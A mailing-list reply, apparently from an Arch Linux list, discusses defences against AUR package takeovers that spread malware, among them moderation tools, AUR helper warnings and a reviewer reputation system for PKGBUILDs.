On 5/28/26 2:32 AM, [email protected] wrote:
I'm against giving up my name and stuff too just to maintain aur packages, and
if I'm forced to, I'm just disown or not update anything I maintain.
In past, I have adopted some packages I saw were orphaned and I use myself,
not because I wanted to maintain them, but I wanted to prevent someone else
from taking them over to spread malware.
How did I find out they were orphaned? My AUR helper listed them as orphaned.
So here are my solutions
1. Improve moderation tools
If subreddits can moderate better, and delete posts in under a minute, we can
too.
Improve UI, make it easy to spot suspicious changes, etc. I really don't wanna
be specific, as I am not a reddit mod,
but having a global moderation queue where accounts registered for a long time
can flag something, could be a good start.
2. Have AUR helpers actually cooperate
What I mean by this is, have them print a red warning that a maintainer has
changed or if a package was recently adopted.
Also have them print out a red warning if a user tries to update a package that
was previously spreading malware,
like "This package was previously taken over. If you installed that version, secure
your machine".
Have this be the default. Noone is gonna dig through aur helper man pages to
find if this exists.
This ofc would require some improvements with Aurweb RPC interface, but so be
it.
I think a reputation system for PKGBUILDs would be highly effective. Currently
only known-bad findings are reported, but known-good findings are not recorded
anywhere.
You could define a set of individuals you consider trustworthy and capable
reviewers, then only accept PKGBUILDs onto your system that have positive
reviews from N of those people.
This kind of system already exists in the Rust ecosystem:
https://github.com/crev-dev/cargo-crev
There's also a toy project that parses the install hook into an AST and flags
things you should probably look into, but it's fairly noisy because it flags
every unrecognized command as suspicious:
https://github.com/kpcyrd/smelly-hooks
It would've flagged and pointed out the npm install in browsh-bin, yet you
should probably not rely on this for security since "we didn't forget any shell
scripting edge-case" is likely not something you want to gamble your computer
integrity on.
cheers,
kpcyrd
